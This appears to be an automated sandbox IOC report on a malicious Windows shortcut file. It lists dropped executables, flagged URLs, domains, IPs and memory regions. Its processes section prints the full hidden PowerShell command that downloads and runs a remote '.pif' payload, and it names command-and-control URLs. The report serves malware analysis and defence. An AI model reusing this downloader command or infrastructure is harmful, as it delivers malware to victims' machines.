IOC Report
Comprobante.lnk.lnk

loading gif

Files

File Path
Type
Category
Malicious
Comprobante.lnk.lnk
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
initial sample
malicious
C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\Desktop\screens.pif
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\screens.pif.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4eyh3bmu.mud.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqa30ycs.ic0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmzi4otn.c2j.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtumicvz.4td.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\188E93\31437F.lck
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\bb7e5d0cf2dfb2b59be71d56e848e059_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GI5H1UFK6LW59IUH41EH.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\a5cebb9ded06a97e.customDestinations-ms (copy)
data
dropped
There are 3 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';
malicious
C:\Users\user\Desktop\screens.pif
"C:\Users\user\Desktop\screens.pif"
malicious
C:\Users\user\Desktop\screens.pif
C:\Users\user\Desktop\screens.pif
malicious
C:\Users\user\Desktop\screens.pif
C:\Users\user\Desktop\screens.pif
malicious
C:\Users\user\Desktop\screens.pif
C:\Users\user\Desktop\screens.pif
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 80
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 80

URLs

Name
IP
Malicious
http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php
45.149.241.169
malicious
http://kbfvzoboss.bid/alien/fre.php
malicious
http://alphastand.top/alien/fre.php
malicious
http://alphastand.win/alien/fre.php
malicious
http://alphastand.trade/alien/fre.php
malicious
https://www.sodiumlaurethsulfatedesyroyer.com
unknown
malicious
https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif
188.114.97.3
malicious
https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg
unknown
malicious
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://www.sodiumlaurethsulfatedesyroyer.com
unknown
https://go.micro
unknown
http://www.ibsensoftware.com/
unknown
https://www.sodiumlaurethsulfatedesyroyer.com/N
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/winsvr-2022-pshelpX
unknown
https://www.sodiumlaurethsulfatedesyroyer.com/ow
unknown
http://www.microsoft.co7
unknown
http://www.microsoft.
unknown
http://go.micros
unknown
https://github.com/Pester/Pester
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 21 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
freighteighttwocam.ddns.net
45.149.241.169
malicious
www.sodiumlaurethsulfatedesyroyer.com
188.114.97.3
malicious

IPs

IP
Domain
Country
Malicious
188.114.97.3
www.sodiumlaurethsulfatedesyroyer.com
European Union
malicious
45.149.241.169
freighteighttwocam.ddns.net
Germany
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2F17000
trusted library allocation
page read and write
malicious
13D8000
heap
page read and write
malicious
2EFA000
trusted library allocation
page read and write
malicious
2F32000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
4988000
trusted library allocation
page read and write
malicious
7FF7C0474000
trusted library allocation
page read and write
27825FE8000
trusted library allocation
page read and write
278229E0000
heap
page read and write
2783CFD4000
heap
page read and write
27822BF0000
heap
page read and write
794E000
stack
page read and write
E120000
trusted library allocation
page read and write
27824B10000
heap
page read and write
7FF7C0530000
trusted library allocation
page read and write
1464000
heap
page read and write
D6BE97B000
stack
page read and write
278255FD000
trusted library allocation
page read and write
2783CFDD000
heap
page read and write
27834FCD000
trusted library allocation
page read and write
2783CF72000
heap
page read and write
D6BEDFE000
stack
page read and write
E0CB000
trusted library section
page read and write
7FF7C0520000
trusted library allocation
page read and write
1260000
trusted library allocation
page read and write
278255C5000
trusted library allocation
page read and write
4850000
trusted library allocation
page read and write
2783CD60000
trusted library allocation
page read and write
D6BE51E000
stack
page read and write
27822A72000
heap
page read and write
1280000
heap
page read and write
73D000
stack
page read and write
7FF7C0570000
trusted library allocation
page read and write
7FF7C0124000
trusted library allocation
page read and write
27825F0F000
trusted library allocation
page read and write
7FF7C0479000
trusted library allocation
page read and write
1230000
trusted library allocation
page read and write
2783CFED000
heap
page read and write
E0F0000
trusted library allocation
page read and write
2783CE8C000
heap
page read and write
F9C000
stack
page read and write
1243000
trusted library allocation
page execute and read and write
7FF7C017C000
trusted library allocation
page execute and read and write
D6BF9CE000
stack
page read and write
7FF7C013B000
trusted library allocation
page read and write
E129000
trusted library allocation
page read and write
E0EB000
trusted library allocation
page read and write
7FF7C0206000
trusted library allocation
page execute and read and write
7FF7C02F0000
trusted library allocation
page execute and read and write
124E000
stack
page read and write
27822CB5000
heap
page read and write
E44E000
stack
page read and write
27824B9E000
heap
page read and write
1250000
trusted library allocation
page read and write
1244000
trusted library allocation
page read and write
27825EAB000
trusted library allocation
page read and write
2E71000
trusted library allocation
page read and write
E0D0000
trusted library allocation
page read and write
F90000
heap
page read and write
7FF7C0590000
trusted library allocation
page read and write
7FF7C0560000
trusted library allocation
page read and write
7A0000
heap
page read and write
BFB000
stack
page read and write
7FF7C0390000
trusted library allocation
page read and write
27834CD1000
trusted library allocation
page read and write
27822ABC000
heap
page read and write
7FF7C03D0000
trusted library allocation
page read and write
2783CD70000
heap
page read and write
2783CFB7000
heap
page read and write
7FF7C0580000
trusted library allocation
page read and write
27824C97000
heap
page execute and read and write
7FF7C03C0000
trusted library allocation
page read and write
FBC000
heap
page read and write
27824B4F000
heap
page read and write
7FF7C0450000
trusted library allocation
page read and write
2C60000
heap
page read and write
D6BFA4F000
stack
page read and write
27825E3F000
trusted library allocation
page read and write
7FF7C0488000
trusted library allocation
page read and write
790000
heap
page read and write
27824BDF000
heap
page read and write
D6BE5DE000
stack
page read and write
27824BE9000
heap
page read and write
E101000
trusted library allocation
page read and write
7FF7C0340000
trusted library allocation
page read and write
138E000
stack
page read and write
2EAE000
stack
page read and write
63C000
stack
page read and write
7FF7C04B0000
trusted library allocation
page read and write
27834D01000
trusted library allocation
page read and write
7FF7C0302000
trusted library allocation
page read and write
27824B20000
heap
page read and write
1200000
heap
page read and write
2CC0000
trusted library allocation
page read and write
2CAE000
stack
page read and write
4FAE000
stack
page read and write
7FF7C0123000
trusted library allocation
page execute and read and write
1011000
heap
page read and write
7DF40F700000
trusted library allocation
page execute and read and write
1240000
trusted library allocation
page read and write
3450000
heap
page read and write
7FF7C0130000
trusted library allocation
page read and write
7FF7C01D0000
trusted library allocation
page read and write
1266000
trusted library allocation
page execute and read and write
B00000
unkown
page readonly
278255D7000
trusted library allocation
page read and write
D6BEAFA000
stack
page read and write
7FF7C0370000
trusted library allocation
page read and write
FD6000
heap
page read and write
7FF7C0320000
trusted library allocation
page read and write
27822CB0000
heap
page read and write
4920000
trusted library allocation
page read and write
27824BEB000
heap
page read and write
E070000
trusted library section
page read and write
52F0000
trusted library allocation
page read and write
278255BE000
trusted library allocation
page read and write
7FF7C0140000
trusted library allocation
page read and write
7FF7C0440000
trusted library allocation
page read and write
D6BFACD000
stack
page read and write
3000000
heap
page read and write
7FF7C0550000
trusted library allocation
page execute and read and write
7FF7C0510000
trusted library allocation
page read and write
ABCD000
stack
page read and write
278249A0000
trusted library allocation
page read and write
1390000
heap
page read and write
12A0000
heap
page read and write
7FF7C03E0000
trusted library allocation
page read and write
1200000
heap
page read and write
27824B60000
heap
page read and write
10A0000
heap
page read and write
11FE000
stack
page read and write
1446000
heap
page read and write
2783CFC1000
heap
page read and write
27824560000
trusted library allocation
page read and write
27822AC7000
heap
page read and write
D6BEC7C000
stack
page read and write
E130000
trusted library allocation
page read and write
FB8000
heap
page read and write
7FF7C01D6000
trusted library allocation
page read and write
E54E000
stack
page read and write
481C000
trusted library allocation
page read and write
2CB0000
trusted library allocation
page read and write
27824970000
trusted library allocation
page read and write
27825380000
trusted library allocation
page read and write
127B000
trusted library allocation
page execute and read and write
7FF7C012D000
trusted library allocation
page execute and read and write
ABE0000
trusted library allocation
page execute and read and write
D6BECF7000
stack
page read and write
27826ADE000
trusted library allocation
page read and write
15CF000
stack
page read and write
FFE000
heap
page read and write
27822C30000
heap
page read and write
E24E000
stack
page read and write
7FF7C05B0000
trusted library allocation
page read and write
7FF7C048C000
trusted library allocation
page read and write
278255D9000
trusted library allocation
page read and write
7FF7C02D1000
trusted library allocation
page read and write
7FF7C03B0000
trusted library allocation
page read and write
11BE000
stack
page read and write
7FF7C05D2000
trusted library allocation
page read and write
1277000
trusted library allocation
page execute and read and write
1270000
trusted library allocation
page read and write
47E8000
trusted library allocation
page read and write
7FF7C02E0000
trusted library allocation
page execute and read and write
2783CED6000
heap
page read and write
124D000
trusted library allocation
page execute and read and write
27825314000
trusted library allocation
page read and write
7FF7C0480000
trusted library allocation
page read and write
475D000
trusted library allocation
page read and write
278265D1000
trusted library allocation
page read and write
7FF7C0400000
trusted library allocation
page read and write
7DF40F720000
trusted library allocation
page execute and read and write
27834D45000
trusted library allocation
page read and write
27825376000
trusted library allocation
page read and write
E12C000
trusted library allocation
page read and write
1254000
trusted library allocation
page read and write
6FD000
stack
page read and write
27825E7C000
trusted library allocation
page read and write
3E75000
trusted library allocation
page read and write
5300000
trusted library allocation
page read and write
784E000
stack
page read and write
27822A93000
heap
page read and write
2783CD90000
heap
page read and write
344F000
stack
page read and write
F98000
heap
page read and write
B52000
unkown
page readonly
278249EF000
heap
page read and write
B02000
unkown
page readonly
27824BD1000
heap
page read and write
D6BE495000
stack
page read and write
10A5000
heap
page read and write
7FF7C02DA000
trusted library allocation
page read and write
D6BEBF7000
stack
page read and write
2783D02F000
heap
page read and write
27824D58000
trusted library allocation
page read and write
2783CF8F000
heap
page read and write
BC10000
trusted library allocation
page read and write
27824C90000
heap
page execute and read and write
5470000
trusted library section
page read and write
5480000
heap
page read and write
AEA0000
trusted library allocation
page execute and read and write
7FF7C0240000
trusted library allocation
page execute and read and write
7FF7C0380000
trusted library allocation
page read and write
27826751000
trusted library allocation
page read and write
27826A2A000
trusted library allocation
page read and write
1079000
heap
page read and write
7DF40F710000
trusted library allocation
page execute and read and write
27824B5B000
heap
page read and write
27826B67000
trusted library allocation
page read and write
46BE000
trusted library allocation
page read and write
2D40000
trusted library section
page read and write
E0FE000
trusted library allocation
page read and write
2F15000
trusted library allocation
page read and write
27822BD0000
heap
page read and write
278268D0000
trusted library allocation
page read and write
144D000
heap
page read and write
3E71000
trusted library allocation
page read and write
F60000
heap
page read and write
27824EFA000
trusted library allocation
page read and write
278262FE000
trusted library allocation
page read and write
27824C1D000
heap
page read and write
D6BE8FE000
stack
page read and write
4EAC000
stack
page read and write
2FEE000
stack
page read and write
7FF7C01E0000
trusted library allocation
page execute and read and write
5310000
heap
page execute and read and write
D6BEB79000
stack
page read and write
2783D058000
heap
page read and write
27834CF1000
trusted library allocation
page read and write
D6BEA7F000
stack
page read and write
2783D056000
heap
page read and write
3460000
heap
page read and write
D6BE87D000
stack
page read and write
2783CE70000
heap
page read and write
27824B4A000
heap
page read and write
B00000
unkown
page execute and read and write
D6BF94F000
stack
page read and write
F9E000
heap
page read and write
7FF7C0350000
trusted library allocation
page read and write
AE6D000
stack
page read and write
EF8000
stack
page read and write
E68F000
stack
page read and write
B5E000
unkown
page readonly
27824585000
heap
page read and write
F70000
heap
page read and write
27826A49000
trusted library allocation
page read and write
278255E5000
trusted library allocation
page read and write
7FF7C0122000
trusted library allocation
page read and write
D6BE9FE000
stack
page read and write
2E6E000
stack
page read and write
14A0000
trusted library allocation
page read and write
7FF7C0513000
trusted library allocation
page read and write
27825C2D000
trusted library allocation
page read and write
126A000
trusted library allocation
page execute and read and write
7FF7C0490000
trusted library allocation
page read and write
100C000
heap
page read and write
AEEE000
stack
page read and write
27824B68000
heap
page read and write
D6BE59E000
stack
page read and write
7FF7C0430000
trusted library allocation
page read and write
AFEF000
stack
page read and write
7FF7C03F0000
trusted library allocation
page read and write
2783CEC0000
heap
page read and write
7FF7C04A0000
trusted library allocation
page read and write
2783CF9D000
heap
page read and write
27834FC3000
trusted library allocation
page read and write
7FF7C05D4000
trusted library allocation
page read and write
13D0000
heap
page read and write
7FF7C05E0000
trusted library allocation
page read and write
AD2D000
stack
page read and write
7FF7C0588000
trusted library allocation
page read and write
12A5000
heap
page read and write
AACE000
stack
page read and write
535E000
stack
page read and write
2783CF77000
heap
page read and write
46F2000
trusted library allocation
page read and write
27824CD1000
trusted library allocation
page read and write
1001000
heap
page read and write
2783D390000
heap
page read and write
2783CF89000
heap
page read and write
7FF7C01DC000
trusted library allocation
page execute and read and write
7FF7C03A0000
trusted library allocation
page read and write
ABD0000
trusted library allocation
page read and write
AD6E000
stack
page read and write
27822AF0000
heap
page read and write
27825983000
trusted library allocation
page read and write
27824540000
heap
page read and write
E115000
trusted library allocation
page read and write
2FAF000
stack
page read and write
49F000
remote allocation
page execute and read and write
35D000
stack
page read and write
27824530000
trusted library allocation
page read and write
E58E000
stack
page read and write
278229F2000
heap
page read and write
2D50000
trusted library allocation
page execute and read and write
27824500000
trusted library allocation
page read and write
27824550000
heap
page readonly
7FF7C0360000
trusted library allocation
page read and write
2783CF06000
heap
page read and write
E9C000
stack
page read and write
2783D03F000
heap
page read and write
A98E000
stack
page read and write
27834FBE000
trusted library allocation
page read and write
E0E6000
trusted library allocation
page read and write
27822A7B000
heap
page read and write
D6BED7E000
stack
page read and write
AC2E000
stack
page read and write
7FF7C02C0000
trusted library allocation
page read and write
48B8000
trusted library allocation
page read and write
2D60000
heap
page execute and read and write
B52000
unkown
page execute and read and write
2F50000
trusted library allocation
page read and write
27824CC0000
heap
page execute and read and write
D060000
trusted library allocation
page execute and read and write
2783D009000
heap
page read and write
143D000
heap
page read and write
D6BEF7C000
stack
page read and write
14B0000
heap
page read and write
27824580000
heap
page read and write
AA8D000
stack
page read and write
7FF7C0410000
trusted library allocation
page read and write
7FF7C0420000
trusted library allocation
page read and write
27826C78000
trusted library allocation
page read and write
2783CFAB000
heap
page read and write
E139000
trusted library allocation
page read and write
2783D05E000
heap
page read and write
106C000
heap
page read and write
7FF7C0330000
trusted library allocation
page read and write
7FF7C0540000
trusted library allocation
page read and write
B02000
unkown
page execute and read and write
D6BEE7D000
stack
page read and write
D6BEEFE000
stack
page read and write
545E000
stack
page read and write
7FF7C0470000
trusted library allocation
page read and write
148E000
stack
page read and write
7FF7C0310000
trusted library allocation
page execute and read and write
2783CD40000
heap
page execute and read and write
278255E9000
trusted library allocation
page read and write
7FF7C0453000
trusted library allocation
page read and write
1250000
heap
page read and write
E28E000
stack
page read and write
27822A18000
heap
page read and write
There are 332 hidden memdumps, click here to show them.